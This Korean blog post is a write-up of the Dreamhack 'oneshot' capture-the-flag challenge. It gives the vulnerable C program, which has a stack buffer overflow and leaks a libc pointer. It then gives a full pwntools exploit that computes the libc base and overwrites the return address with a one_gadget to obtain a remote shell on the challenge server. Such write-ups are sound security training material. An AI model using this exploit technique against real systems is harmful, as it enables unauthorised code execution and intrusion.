외로운 Nova의 작업실
dreamhack - oneshot write up 본문
- source code
// gcc -o oneshot1 oneshot1.c -fno-stack-protector -fPIC -pie
#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void alarm_handler() {
puts("TIME OUT");
exit(-1);
}
void initialize() {
setvbuf(stdin, NULL, _IONBF, 0);
setvbuf(stdout, NULL, _IONBF, 0);
signal(SIGALRM, alarm_handler);
alarm(60);
}
int main(int argc, char *argv[]) {
char msg[16];
size_t check = 0;
initialize();
printf("stdout: %p\n", stdout);
printf("MSG: ");
read(0, msg, 46);
if(check > 0) {
exit(0);
}
printf("MSG: %s\n", msg);
memset(msg, 0, sizeof(msg));
return 0;
}
- exploit code
from pwn import *
p = remote("23.81.42.210", 9729)
#get address stdout
p.recvuntil("stdout: ")
stdout = p.recvuntil("\n")[:-1]
#proc - 1 :cal base lib address
stdout = int(stdout, 16)
lib_base = stdout - 0x3c5620
one_gadget = lib_base + 0x45216
#proc -2 : payload
payload = b"A"*24 + b"\x00"*8 + b"B"*8
payload += p64(one_gadget)
#overwirte one_shot gadget
p.send(payload)
#receive print
print(p.recv())
#interactive
p.interactive()
'Computer App Penetesting > System Vulnerability' 카테고리의 다른 글
dreamhack - fho write up (0) | 2023.04.24 |
---|---|
dreamhack - hook write up (0) | 2023.04.22 |
dreamhack - basic_rop_x86 write up (0) | 2023.04.20 |
dreamhack - basic_rop_x64 write up (0) | 2023.04.20 |
dreamhack 시스템해킹 - 12(ssp_001 문제 풀이) (0) | 2023.02.22 |
Comments